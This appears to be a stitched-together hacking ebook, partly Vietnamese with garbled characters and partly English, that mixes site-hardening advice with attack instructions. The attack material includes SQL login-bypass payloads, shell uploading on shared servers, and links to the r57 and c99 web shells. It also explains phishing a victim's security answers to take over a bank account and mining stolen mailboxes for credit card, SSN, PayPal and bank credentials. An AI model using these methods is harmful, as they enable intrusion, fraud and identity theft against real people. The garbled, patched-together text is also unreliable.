    -Nu bn c mt mc tiu mun hack trang web no m mnh li khng c host trn cngServer th ta phi Reverse IP xem nhng site cng Server v t ta s hack theo dngleo thang, c gng search li ca nhng site cng server t ta hack bng nhiu cch nhSQL Injection, File Inclusion Attack,RFI, XSS t vo c admin panel ca site ri thta c gng lm sao Upload c shell ln. Sau khi c shell trn cng server vi site m tamun hack th tabt u vn dng kh nng local hack ca mnh v attack + deface nu mun.

    Ta cng c th p dng trng hp ny hack shop bng localhack.Nhng nhng shop ln tha s xi Server ring nn vic mun hack c vo cng l mt vn .

    -Nu gp pass ca Admin l MD5 m bn lm bing crack th ta c th convert password123456 sang dng MD5 v sau chp vo pass MD5 kia (tc nhin l lc ny bn voc Mysql ca site th mi c th lm c vic ny). Ta cng c th change email addressv sau dng tnh ny forgot password (ci ny hieupc thng dng cho VBB hay IBF resetpassword ca admin). Sau ng nhp th xem sao.


    More about CHMOD:

    One of the mistakes admins often make is a wrong CHMOD. With a wrong CHMOD, the likelihood of the site being attacked is much higher than for sites with a correct CHMOD, especially for sites on the same server during a local hack. Of course this mistake alone cannot be attacked directly, because it is not in itself an attackable flaw. It is easily exploited when a directory is given write and execute permission at the same time, usually directories that allow uploads, so a hacker can easily run a shell in that directory. Another case is local hacking, where CHMOD 777 is a disaster, because the whole directory is then under the attacker's control. I am sure that any hacker doing a local hack who sees the bright green colour of a 777 directory (directories are normally shown in a different colour) is delighted and thinks this admin is a real amateur.

    Why am I writing this? Because many admins and coders do not know what CHMOD is, or understand it only superficially. They care only that the website runs, full stop. Many people even naively believe that write permission is the same thing as 777. Completely wrong!!! So what is CHMOD?

    CHMOD concerns files and directories; its function is to tell the server who may do what to a given file or directory. In the main, CHMOD sets permission to read, to write to a file (or directory), and to execute a given task. Because most servers run on UNIX systems, we will look at how CHMOD works on those servers.

    On UNIX systems, users are divided into 3 groups: "user" (the direct owner of the files), "group" (members of a group the file owner belongs to) and "world" (everyone else). When you connect to the server, it determines which group you belong to. For example, when you connect to the server by FTP and log in as a member, the server places you in the "user" group. Other members who connect by FTP belong to "group". Anyone who reaches your site with a web browser is placed in "world".

    Once the group is determined, the user is assigned certain rights over a file or directory: specifically, to read, write or create (or delete) files. To view a directory, the directory must permit viewing. To view the contents of a directory, the files or subdirectories inside it must also be set to "allow read". Creating a new file or directory inside that directory requires write permission. In short, to do any of the above, the directory must be given "read permission" and "execute permission".

    Now let us put this into practice...

    As stated above, there are 3 groups of users and 3 "permissions" on files or directories. To specify the permissions for each group, the following numeric notation is used by convention:

    4 = read (permission to read)
    2 = write (permission to write)
    1 = execute (permission to execute)

    By simple addition these numbers can express a whole "combination" of permissions. For example, 3 (2+1) - write and execute permission on the file (or directory); 5 (4+1) - read and execute permission; 6 (4+2) - read and write permission; 7 (4+2+1) - read, write and execute permission. In all there are the following 7 options:

    7 = read, write & execute
    6 = read & write
    5 = read & execute
    4 = read
    3 = write & execute
    2 = write
    1 = execute


    A CHMOD value usually has 3 digits: the first digit gives the permissions assigned to users in the "user" group (that is, you). The second digit gives the permissions of users in the "group" group, and the third digit is for the "world" group.

    Most modern FTP programs support CHMOD in the way described above (for example, the most powerful FTP access tool today is WS_FTP).

    Still, it does no harm to know more about the UNIX commands themselves. The "chmod" command in UNIX has 2 modes: absolute (with numbers) and symbolic (with letters).

    In absolute mode (with numbers), the 3-digit combination described above is used to express the permissions.

    In symbolic mode, we meet the following symbols:

    "r" - permission to read
    "w" - permission to write
    "x" - permission to execute

    In addition there are:

    "u" - for user
    "g" - for group
    "o" - for other (world)
    "a" - for all

    For example: 755 = chmod u=rwx,go=rx filename; 644 = chmod u=rw,go=r filename; 600 = chmod u=rw,go= filename; 444 = chmod a=r filename.

    Below is a table of the combinations commonly seen on most hosting services:

    Access rights (U G W)    Command (code)    Description
    rwx r-x r-x              chmod 755         For directories, CGI scripts and other executable files
    rw- r-- r--              chmod 644         For ordinary files
    rw- --- ---              chmod 600         Hides files from everyone except you and your scripts

    U = user; G = group; W = world; r = Read; w = Write; x = Execute; - = no permission
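    The numeric and symbolic notations above, together with a check for the risky case the article describes (a directory that "world" can both write to and execute), can be put into a short script. This is an added example, not part of the original ebook; the directory tree it builds and the function names are constructed for the illustration, and a POSIX file system is assumed.

```python
import os
import stat
import tempfile


def octal_to_symbolic(mode):
    """0o755 -> 'rwxr-xr-x', using the 4/2/1 weights for user, group, world."""
    out = []
    for shift in (6, 3, 0):
        digit = (mode >> shift) & 0o7
        out.append(("r" if digit & 4 else "-") +
                   ("w" if digit & 2 else "-") +
                   ("x" if digit & 1 else "-"))
    return "".join(out)


def symbolic_to_octal(sym):
    """'rw-r--r--' -> 0o644; rejects anything that is not nine r/w/x/- characters."""
    if len(sym) != 9:
        raise ValueError("expected nine characters such as 'rwxr-xr-x'")
    mode = 0
    for i, ch in enumerate(sym):
        expected = "rwx"[i % 3]
        if ch == expected:
            mode |= 1 << (8 - i)
        elif ch != "-":
            raise ValueError(f"unexpected character {ch!r} at position {i}")
    return mode


def audit_tree(root):
    """Return sorted (relative path, octal mode, reason) for world-writable entries."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # link permissions are not meaningful; skip them
            mode = stat.S_IMODE(st.st_mode) & 0o777
            rel = os.path.relpath(path, root)
            if stat.S_ISDIR(st.st_mode) and mode & 0o002 and mode & 0o001:
                findings.append((rel, f"{mode:03o}",
                                 "directory is writable and executable by world"))
            elif mode & 0o002:
                findings.append((rel, f"{mode:03o}", "file is writable by world"))
    return sorted(findings)


def build_demo_tree(root):
    """Constructed sample layout: one web root with a wrongly set upload folder."""
    web = os.path.join(root, "public_html")
    uploads = os.path.join(web, "uploads")
    os.makedirs(uploads)
    config = os.path.join(web, "config.php")
    notes = os.path.join(uploads, "notes.txt")
    for path in (config, notes):
        with open(path, "w") as fh:
            fh.write("sample\n")
    os.chmod(web, 0o755)      # directories: chmod 755, as in the table
    os.chmod(config, 0o644)   # ordinary files: chmod 644
    os.chmod(uploads, 0o777)  # the mistake the article warns about
    os.chmod(notes, 0o666)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for rel, mode, reason in audit_tree(tmp):
            print(mode, octal_to_symbolic(int(mode, 8)), rel, "-", reason)
```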

    More about by-pass login:

    Sometimes you visit a page that has a login section... and what if you want to log in with administrator rights? You only need to know the user and pass to log in, right? But what if you do not know them? By-pass login lets you log in there with the highest privileges.. that is the basic idea. Here is some data you can submit to see whether the page is affected by login bypass:

    Username            Password
    ' or 1=1--          ' or 1=1--
    " or 1=1--          " or 1=1--
    or 1=1--            or 1=1--
    ' or 'a'='a         ' or 'a'='a
    " or "a"="a         " or "a"="a
    ') or ('a'='a       ') or ('a'='a

    Below is an article by boyxintin from Hcegroup.net:

    A little more about the technology.

    Today's applications, whether web applications or Windows applications, all use a 3-tier model consisting of: the interface tier, the processing tier and the database tier.

    - the interface tier is what the user sees, such as a web page or the Yahoo program you can look at.
    - the processing tier consists of the code that handles events; for example, when you enter user + pass into Yahoo msg and press enter, what happens? The processing tier carries out those events.
    - the database tier is used to store information, such as customer account information, administrative information,... depending on what the application is for. The database is stored in a database management system (Mysql, Sql server, Oracle, MS Access...)

    Example: hxxp://daleosterloh.com/bug/index.php

    At this point the processing tier runs queries against the database to see whether the information you entered is correct, and runs its script code.

    Why is a bypass possible? To bypass perfectly, first of all you must understand what is written in the processing tier. Anyone who has read hieupc's ebook may also know a few keywords for bypassing; all of those keywords were produced by attackers who broke into systems and looked at the source, and because sites often share the same source (bought from somewhere), when one falls they all fall together.

    Now I will analyse the code above so you clearly understand why a bypass is possible.


    After the presentation tier sends the data back, the processing code has two variables, $username and $password, which hold the user and pass the user typed in.

    Leaving the clutter aside, focus on the query:

    select * from users where username='".$username."' and password='".$password."'

    and the if statement:

    if ($list_rows > 0) {
        header("Location: manage.php?hcegroup=1");
    } else {
        header("Location: error.php");
    }

    This means the following:

    Query: select all attributes (username, password...) from the table users where username = the user entered and password = the password entered.

    if: if the number of rows returned is > 0, let the user in; otherwise refuse.

    Up to here I see no error in the logic of a login: look in the database for that user + pass; if the count is greater than 0, it exists, so let the user in; otherwise deny. As for why ($list_rows > 0) is used: a user normally appears only once in the database, so a match gives the value 1, and some programmers write > 0 instead of = 1.

    Now enter user = abcd and password = ' or '1'='1 in place of the part shown in red above. The query becomes:

    select * from users where user = 'abcd' and password ='' or '1'='1'

    The effect of this statement is simple: it no longer matters what the user or the pass is, because '1'='1' is a condition that is obviously true, so every user in the table is selected and the number of users found is always greater than 0 (unless the database has no users at all). You have now passed the if statement and reached the admin page. If you understood what I wrote above, you can deduce that it does not have to be '1'='1'; it could be '1'<>'0' or 1>0 or 'a'='a or 'a'<>'b. As long as a true condition is inserted into the query it works, so there are billions of ways to bypass.

    A further explanation of the ' and -- characters used in a bypass, which also puzzled me when I first read about it. Take the bypass of the login above with the pass ' or '1'='1: why is there a ' at the start, and why is there no ' after the last 1? Look at the select statement (ignore the " characters):

    select * from users where user ='' and password=''


    The user and pass you supply are placed between the two ' characters, so to keep the syntax correct you have to supply them like this:

    select * from users where user ='abcd' and password='' or '1'='1'

    The point is simply that unless the quotes are closed, SQL does not treat the values we pass in as strings.

    In addition, -- starts a single-line comment: once you add --, the characters after it no longer mean anything to SQL. For example, for the pass above I could use the password ' or '1'='1'-- . The statement then looks like this:

    select * from users where user ='abcd' and password='' or '1'='1'--'

    The ' after -- now has no effect, so the statement does not raise an error.


    III. How To Get These Important Information

    1. Kim link Admin nh th no:

    C mt cu chuyn khi hi l Hieupc tng nhiu ln kim link admin thng qua chat hoc giemail hi admin l link admin ca site l g?. Ci ny cc bn c tin ni khng?. S tht l cchny thnh cng y v quan trng lbn phi bit cch n ni v a ra bng chng r rng logicmt cht l ok. y l mt ln chat qua Yahoo hi xin link admin ca 1 trang web m hieupcm mm hoi khng ra link admin upload shell ln, Hieupc c c user v pass admin

    thng qua li SQL Injection. Xem hnh di y bn s hiu nh:


    Cui cngth link admin ca site m Hieupc ang attackl: http://www.site.com/ecp c nhiu m ny gi au u.

    Kimc ci link admin ri gi upload shell ln thi, phi mc cng i scan link ri li mmm chi cho mt. Cch ny lm tuy c phn mo him nhng quan trng l kh nng sng tologic v bnh tnh ca bn.

    Lu : C gng kim c email hoc nick chat ca Webmaster hoc ngi m Design ra Webny.Nh xem mi quan h site c lin quan g n ngi mnh s lin h hi link adminnh.

    Cng c ln Hieupc email hi link admin v cng thnh cng, gi kim li email show cho mi ngi xem nhng kim ny gi khng ra.


    2. Ly nhngthng tin quan trng m tacn:

    Ta thng ly nhng thng tin quan trng nh: CC, hosting, bank account, accounts web,itunes, ebay, paypal..my ci ny trong email list c kh nhiu, mun kim c email list +password d nhin l bn phi hack, hack nhng dng li nh: SQL Injection. Sau y l nhngminh chng:

    C ln hieupc hack c mt bank account US nhng li b hi security questions , mc d cc user v pass ca email, v email search c bui khng ra c my ci answer ca n lg. V vy Hieupc ngh ra cch l fake1 ci email vi ni dung nh sau, cc bn xem hnh ls hiu(ti gi password email ca n vn cha i, login vo email ca hn ta ri chp mtci hnh no):

    Vy l cng c c ci mnhcn ri. Login vo bank account thi. Ci ny li mang tnhlogic v mt cht may mn na.

    Hieupc cn mt s cch khc na nhng ch dng ti y , Hieupc tng bin mt shop CCNON thnh mt shop c FULL INFObao gm SSN, DOB, PINv c c credit card cscan qua email cng thng qua nhng th thut mang tnh logic v sng to ny . Ch gi nhvy cc bn t tm hiu, v ci ny n cng mang tnh cht phishing hay scam nhiu qu .

    - Ly thng tin t Email List m bn c nh th nol tt nht. Thng th Email list ca bn csn password ca nhng email v vy bn login nhng email dng sau : gmail.com, yahoo.comv hotmail.combao gm clive.com hay msn.com. L s c th c nhng thng tin quan trngnh: CC, hosting, bank account, accounts web..


    Bn ch cn dng tnh nng search emailc sn (hu ht cc dch v email u c phn searchemail), v d nh Hieupc cn tm bank account th nhch: bank lc ny s hin ra nhiuemail c lin quan n t kho bank. T y bn s bit ch email s hu nhng bank g, sau ta c gng dng username v password ca email login nu khng thnh cng th ta li searchtip vi ch: usersau search sang: password, gm ton b username v password ra notepadsau ta th ln lt. Tng t cch lm nh vy ivi nhng thng tin m tacn nh: SSN,DOB, Paypal, Itunes (i vi PayPal khng cn bit password ca email l my k t, ta chcn login c vo email ri search ch Paypal xem th ch email cxi Paypal hay khng,nu c xi Paypal th ta tip tc search tip password ri kim ci no c password l trn 8 kt, sau cng mang vo login th xem sao)

    V d minh ho v 1bank BOA m hieupc hack c c balance lun nh (v bank accounthack mi c balance cn bank reg bng fake full info th lm g c balance , ng khng n?)

    Lu :Nhng file attachementdi dng file: .doc,.xls,.pdf ca ch email nhiu lc li chanhng thng tin quantrng ca h. rt nhiu ln hieupc ly c nhiu thng tin nh: CreditCard, Bank account, Passport, PayPal trong mt file attach m ch email save li trong

    emailV d v mt Filedocument cha thng tinBank v CC:


    Hieupc thng checknhng email di dng @yahoo.com hack bank account v a s thnhcng rt nhiu. Trong Yahoo bn c th search File Documents rt nhanh bng cch sau,bnchuyn sang ch view: Mail Classic v sau chn My attachements l n s hin ra ngay.


    IV. Exploiting By Tool, Scripts:

    1. Shell Script:

    - Hin nay c rt nhiu shell script, nhng hieupc thy ch c r57.php, c99.php v kshell.aspx ltt nht.

    Download b shell scripts ti y:

    http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar

    http://www.guru.net.vn/kshell_1.2.zip

    2. Sau y l nhng Tools Hack m hieupc hay dng nht:

    - Tool dnh cho scan: Acunetix Web Vulnerability Scanner 6, Advanced IP Scanner1.5,Network Monitor.

    - Sniffer Tools: EffeTech HTTP Sniffer, Packet Sniffer, Password Sniffer, MSN Sniffer

    - Tools h tr cho SQL Injection: AKD-injection 3, Absinthe 1.4.1, URLScan v3.1, Scrawlr,Microsoft Source Code Analyzer, BAKOs SQL_Injection_Scanner_v2.2, SQL INJECTORV2.0.

    - Database Tools: MySQL, MSSQL Server, RazorSQL

    - Tools h tr thm: ActivePerl, ActivePython, PHP, CGI, ASP, Metasploit 3, XN Hashing Tool,Putty, CuteFTP, RemoteDesktop

    - Link hay v LFI v RFI:

    http://www.guru.net.vn/PermaLink,guid,1924e061-6881-453d-a841-5ec94c00591f.aspx

    Nhng tools trn bn c th search v download google.com.


    Not yet fixed (unfixed):

    // Vulnerable: the request value goes into the query unchanged.
    $id = $_GET['id'];
    mysql_query("SELECT * FROM xviet.net WHERE id=$id");

    Fixed:

    // intval() forces $id to an integer before it reaches the query.
    $id = intval($_GET['id']);
    mysql_query("SELECT * FROM xviet.net WHERE id=$id");

    In intval, int stands for integer and val stands for value, so the value of $id must be an integer; this way a hacker cannot inject into or exploit your SQL statement.

    This article is based on "Anti PHP-SQL Injection" from vncoder.net.

    SQL Injection:

    - Most SQL Injection flaws come from an SQL statement that is wrong, or that the user can make wrong, so that it no longer does what it was meant to do. Suppose we have a login-check script like this:

    Code (php)

    - The script above is a very simple one that performs a login through an SQL statement checking username and password. The original SQL statement is:

    Quote:

    SELECT * FROM users WHERE user = "$username" AND password = "$password"

    - However, this is a very serious SQL Injection flaw if the user enters the following as the user value: " OR 1 OR user="

    - The SQL statement then becomes:

    SELECT * FROM users WHERE user = "" OR 1 OR user="" AND password = "$password"

    - The result returned is every user in the database, and this is of course an invalid login (the password variable can also be used to create an SQL Injection). The flaw above is caused by the $username variable. It can be fixed by checking the user variable first and only then checking the pass variable, or, more quickly, by using one built-in PHP function that fixes almost all SQL Injection flaws: addslashes.

    - A few words about addslashes: it returns a string with a \ in front of the characters that need quoting in database queries. Those characters are ' " \ and NUL (\0).

    - Signature of addslashes: string addslashes ( string str)

    - With addslashes our SQL statement becomes:

    SELECT * FROM users WHERE user = "\" OR 1 OR user=\"" AND password = "$password"

    - The SQL statement now behaves as it was meant to. Some other SQL Injection flaws can be fixed the same way. I repeat that this method fixes almost all SQL Injection flaws, that is, those caused by PHP variables; for flaws in the SQL statement itself it has no effect. However, if you use this method and your SQL statements are sound, I believe you will not need to worry about SQL Injection.
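    The login query and the numeric id lookup discussed above, shown next to a parameterized form, as an added example that is not part of the ebook or the articles it quotes. It assumes PHP 7.4+ with pdo_sqlite; the table, columns, account and function names are constructed for the demonstration. It also shows that addslashes() leaves unquoted numeric input unchanged, which is why the value is validated and bound instead.

```php
<?php
// Added example, not code from the ebook. Assumes PHP 7.4+ with pdo_sqlite.
// Table, column, account and function names are constructed for this demo.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
$seed = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)');
$seed->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

/** The pattern the text describes: input concatenated into SQL, "rows > 0" test. */
function loginConcatenated(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT * FROM users WHERE username='" . $user . "' AND pw_hash='" . $pass . "'";
    return count($db->query($sql)->fetchAll()) > 0;
}

/** Hardened form: bound parameter, exactly one row expected, hash checked in PHP. */
function loginPrepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);          // sent as data, never parsed as SQL
    $hashes = $stmt->fetchAll(PDO::FETCH_COLUMN);
    return count($hashes) === 1 && password_verify($pass, $hashes[0]);
}

/** Numeric lookup: validate the type, then bind as an integer. */
function findUserById(PDO $db, string $rawId): array
{
    if (!ctype_digit($rawId)) {               // only decimal digits are accepted
        return [];
    }
    $stmt = $db->prepare('SELECT id, username FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$tautology = "' or '1'='1";                   // password value analysed in the text
$numeric   = '1 or 1=1';                      // contains no quotes for addslashes() to escape

$results = [
    'concatenated login accepts tautology' => loginConcatenated($db, 'abcd', $tautology),
    'prepared login accepts tautology'     => loginPrepared($db, 'abcd', $tautology),
    'prepared login accepts real password' => loginPrepared($db, 'admin', 'constructed-sample-password'),
    'addslashes changes numeric input'     => addslashes($numeric) !== $numeric,
    'rows for id "1 or 1=1"'               => count(findUserById($db, $numeric)),
    'rows for id "1"'                      => count(findUserById($db, '1')),
];
foreach ($results as $label => $value) {
    echo str_pad($label, 40), var_export($value, true), PHP_EOL;
}
```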

    PHP Injection:

    - PHP Injection flaws usually occur in scripts that read files, interact with the system and so on. Here is a typical case of PHP Injection:

    Code (php)

    At first glance nothing looks wrong, but if for some reason the variable $file is not declared, this is a very serious PHP Injection flaw.

    - In that case $file is declared by PHP itself, through the Register-Global feature, and the result is that the script outputs the contents of somescript.php or of any file on the system (including the file that holds passwords, if the hacker takes the trouble to look for it, at which point our host is finished).

    - On analysis we see that $file gets declared because of the Register-Global feature (which automatically registers variables from GET, POST, COOKIE, etc.), and the simple fix is to turn this feature off. Turning it off has little effect on PHP.

    Further reading:

    Safe Mode = On, what it is and how to deal with it: http://forum.eda.vn/viewtopic.php?f=45&t=971#p5435

    What is Safe Mode?

    Safe Mode in PHP: a technique commonly applied by shared hosting to strengthen security (against internal attacks, usually called Hack Local). The technique is not really sound at the PHP level, yet it is still applied in many places today. Fortunately, from PHP 6.0 on this feature will be removed and we will no longer need to worry about it.

    Is Safe Mode On or Off?

    Create a file info.php in your web directory with the following content:

    Open the URL of info.php. For example:

    http://localhost/info.php
    http://yourdomain/info.php

    Look for "Loaded Configuration File" to find where the php.ini configuration file is located.
    Look for "safe_mode" to see the current state of Safe Mode (On is enabled, Off is disabled).

    Turning Safe Mode off?

    Case 1: You manage the server.

    Locate the php.ini configuration file, open it and set the value:

    safe_mode = Off

    Case 2: You are not the person who manages the server.

    You can try to turn it off in one of three ways (provided the server allows the original setting to be overridden).

    - Method 1 - Create a file "php.ini" in your web directory with the directive:

    safe_mode = Off

    - Method 2 - Create a file ".htaccess" in your web directory with the directive:

    php_flag safe_mode off

    - Method 3 - Use PHP's ini_set function: put the following statement in a configuration file (for example globals.php or configuration.php):

    ini_set('safe_mode','Off');


    How Safe Mode works:

    Suppose you have a script /home/hieupc/do_some_thing.php with the content:

    With Safe Mode = On, when you run the script do_some_thing.php above, the server checks who the Owner of do_some_thing.php is.

    For example "hieupc", "apache" or some "user-xyz". If the task "job-x" includes an operation on some file or directory (the directory /opt/lampp/tmp, for instance) and that file or directory belongs to a different Owner, an error occurs.

    In addition, with Safe Mode = On many functions may be disabled.

    For example move_uploaded_file(), mkdir()... So if your *.php script uses one of these functions, an error also occurs.

    List of the disabled functions: http://vn2.php.net/manual/en/features.safe-mode.functions.php

    Preventing SQL Injection attacks:

    You want to reduce the opportunity for attackers to place malicious SQL code in command parameter values.

    Many applications build dynamic SQL statements by joining separate pieces into one large string. This approach causes problems when working with binary data, and it also makes it possible for an attacker to execute malicious SQL code by injecting it into a parameter value. The malicious code can be used to tamper with information in the database or even to run another application on the server. You can see some frightening examples on database servers at http://www.owasp.org/asac/input_validation/sql.shtml.

    To prevent this problem, validate the input supplied by the user: check that it has the expected data type, is not unusually long, and so on. The easiest way to do this is to use a parameterized query.

    Parameterized queries are used for all stored procedure calls, but you can also use them with dynamic SQL commands. In the second case, you take a normal SQL command and replace the dynamic values with parameters (the result looks like the body of a simple stored procedure). Here is a parameterized SQL command:

    INSERT INTO Shippers (CompanyName, Phone) VALUES (@CompanyName, @Phone)


    To use this command, you add the corresponding Parameter objects to the Command object (with suitable values). This case requires two parameters (@CompanyName and @Phone). The Console application below uses this parameterized query to add a new record to the Shippers table of the Northwind database.

    Imports System.Data
    Imports System.Data.SqlClient

    Public Module ParameterizedQuery

        Private ConnectionString As String = "Data Source=localhost;" & _
          "Integrated Security=SSPI;Initial Catalog=Northwind"

        Public Sub Main()
            ' Create the connection and the command.
            Dim Con As New SqlConnection(ConnectionString)
            Dim UpdateSQL As String = "INSERT INTO Shippers " & _
              "(CompanyName, Phone) VALUES (@CompanyName, @Phone)"
            Dim Cmd As New SqlCommand(UpdateSQL, Con)

            ' Add the input parameters.
            Dim Param As SqlParameter = Cmd.Parameters.Add("@CompanyName", _
              SqlDbType.NVarChar, 40)
            Param.Value = "Test Company"
            Param = Cmd.Parameters.Add("@Phone", SqlDbType.NVarChar, 24)
            Param.Value = "(503) 555-9931"

            Try
                ' Execute the command.
                Con.Open()
                Dim Rows As Integer = Cmd.ExecuteNonQuery()
                Console.WriteLine(Rows.ToString() & " row(s) affected.")
            Catch Err As Exception
                Console.WriteLine(Err.ToString())
            Finally
                Con.Close()
            End Try

            Console.ReadLine()
        End Sub

    End Module

    Some ways to defend against SQL Injection:

    Note that ordinary packet-filtering firewalls cannot protect you from an SQL Injection attack. They are not smart enough to recognise the signs of the attack, and the attack is by nature caused by a flaw in the application. Defending against it therefore needs specific techniques, chiefly improving the flawed application. We look at several methods in turn:

    Limiting discovery of the flaw:

    Attackers rely on flaws in the application's code to attack, and specifically on tell-tale signs to discover that an application is flawed. Hiding those signs, making them harder to interpret, or removing them is something most security professionals do. Note that this technique only hides the flaw; the flaw is still in the application, and the technique merely stops it being discovered too easily and exploited.

    Clever attackers can still see through this kind of defence. It does stop simple attacks such as appending a ' (quote) to the end of the URL, because the way such attacks find flawed applications depends on the signs returned by the application or directly by the database. We can return only generic messages or redirect to the original page. In that case, finding the flaw and identifying the target becomes extremely hard for the attacker.

    However, attackers keep creating more sophisticated and better techniques for finding flaws, which determine the returned signs indirectly. This kind of attack is also called Blind SQL Injection, as covered above.

    Defending from the outside:

    This approach uses a special firewall to protect you from applications that access the database with malicious intent. Keep in mind that the attacker interacts with the web application through a browser over a remote connection, and the application then sends a request to the database. So we can block attacks between the attacker and the application, between the application and the database, and even on the database itself.


    Some defensive measures that can be applied:

    Filters, scanners and database access controls make the web application harder to attack.

    Improving input data:

    The real defence against SQL Injection is to check input and to build queries correctly. As mentioned, the flaw exists because the application does not check the data the user enters. The user can therefore alter or edit parameters, or add an entire query entity to the statement. So all user input needs to be monitored and subject to definite constraints.

    First, the application needs to classify the types of its input. For example, if the application requires numeric input, then when it receives the input it should accept nothing but numbers. Some checking functions in PHP:

    is_numeric($str): checks whether $str is numeric
    is_int($str): checks for the integer type
    is_float($str): checks for the floating-point type
    ...

    Second, if the type of the input is not clear, you must at least determine which kinds of input are not allowed to be submitted. In that case we have to filter quotes, commands and special characters. Some filtering can be applied across the whole application (such as never storing data that contains a quote mark in the database) and some on particular kinds of input (such as no comma in an e-mail address).

    Example:

    magic_quotes_gpc (GPC = GET, POST, COOKIE)

    It checks data of the three kinds above, and when it finds a ' (single quote), " (double quote) or \ (backslash), it automatically adds a \ (backslash) immediately before it:


    + CHMOD directories to 701 and try never to CHMOD 777. For some unimportant folders you can CHMOD 755 so that the contents of the folder are displayed correctly and completely.

    - Note: some servers support CHMOD 101 on directories. If your server supports this, use it, because this CHMOD is very safe; even the Owner cannot view the folder structure, not even over FTP.

    - CHMOD files to 604 and remember never to leave them at 666. If something needs 666, CHMOD temporarily for that moment and then CHMOD back immediately. On servers that support CHMOD 404 on files, use that.

    - If you do not want anyone poking around your admincp, simply switch it off. A new protection mechanism, based on the CHMOD behaviour of Linux servers, works as follows: you create two files, one that opens admincp and one that closes it.

    Code for the file that opens it, named on.php:

    Code for the file that closes it, named off.php:

    So when you want to log in to admincp, you need to open the link to on.php; only then is admincp opened, and you can log in. When your working session is finished, you open the link to off.php and admincp is closed automatically. This saves time, because you do not need to log in to the Control Panel to CHMOD the directory.

    - Change the structure and the default names of files that hold important information. If you can, change the database structure as well.

    - Configure .htaccess so that only the Admin's IP can reach admincp, and have the admin connect to the server over SSH to make changes in admincp.

    - To be more thorough, you can download the index file of admincp and delete it from the host. When you need it, upload the index file again, use it, and delete it when you are done.

    - Set up Admin access barriers that do not rely on the database; encrypting User/Pass is even better. In addition, have a system that checks the actions of MODs and Admins, so that an action is carried out only if the confirmed privileges are sufficient (Matrix uses this very successfully).

    The above is a step-by-step guide to help you defend against Local attack. It is only a basic guide; when you apply it, be a little flexible, and if you have new ideas, discuss them together. I hope this article helps Admins secure their forums better.
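    A check for the modes the list above warns against (777 on directories, 666 on files), as an added example that is not from the ebook. It assumes a POSIX file system; the function name and the constructed demo tree are hypothetical. It reports every entry that is writable by "other".

```php
<?php
// Added example, not code from the ebook. Assumes a POSIX file system.
// The function name and the demo tree below are constructed for illustration.
declare(strict_types=1);

/**
 * Walk $root and return [path => octal mode] for every file or directory
 * whose mode grants write access to "other" (for example 777 or 666).
 */
function findWorldWritable(string $root): array
{
    $findings = [];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST   // report directories as well as files
    );
    foreach ($walker as $entry) {
        if ($entry->isLink()) {
            continue;                           // a symlink's own mode is not meaningful
        }
        $mode = $entry->getPerms() & 0777;      // keep only the rwx bits
        if ($mode & 0002) {                     // "other" has write permission
            $findings[$entry->getPathname()] = sprintf('%03o', $mode);
        }
    }
    ksort($findings);
    return $findings;
}

// Constructed demo tree: one file at the recommended 604, one directory at 777
// and one file at 666, the two modes the text says to avoid.
$root = sys_get_temp_dir() . '/chmod-audit-' . bin2hex(random_bytes(4));
mkdir($root . '/uploads', 0755, true);
file_put_contents($root . '/config.php', "<?php // constructed sample\n");
file_put_contents($root . '/uploads/cache.dat', 'constructed sample');
chmod($root . '/config.php', 0604);
chmod($root . '/uploads', 0777);
chmod($root . '/uploads/cache.dat', 0666);

foreach (findWorldWritable($root) as $path => $mode) {
    echo $mode, '  ', $path, PHP_EOL;
}

// Remove the demo tree again.
unlink($root . '/uploads/cache.dat');
unlink($root . '/config.php');
rmdir($root . '/uploads');
rmdir($root);
```

    Pointing findWorldWritable() at a real web root gives the list of entries to bring back to the modes recommended above.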

    Further reading: http://hieupc.com/joomla/bao-mat-website-joomla/134-chong-tan-cong-sql-injection.html

    Preventing SQL Injections (author: Anthony Ferrara - Joomla Core Team, original article in English): http://developer.joomla.org/tutorials/33-tutorials/181-preventing-sql-injections.html

    SQL Injection: http://en.wikipedia.org/wiki/SQL_injection

    2. Preventing LocalHack: Securing MySQL:

    MySQL, as we know, is a very popular DBMS. Broadly it comes in four editions:

    * MySQL Standard includes the standard storage engine, as well as the InnoDB storage engine, which is touted as a transaction-safe, ACID-compliant database with some additional features over the standard version.
    * MySQL Pro is the commercial version.
    * MySQL Max includes the more technologically advanced features that are available during early access programs.
    * MySQL Classic is the standard storage engine with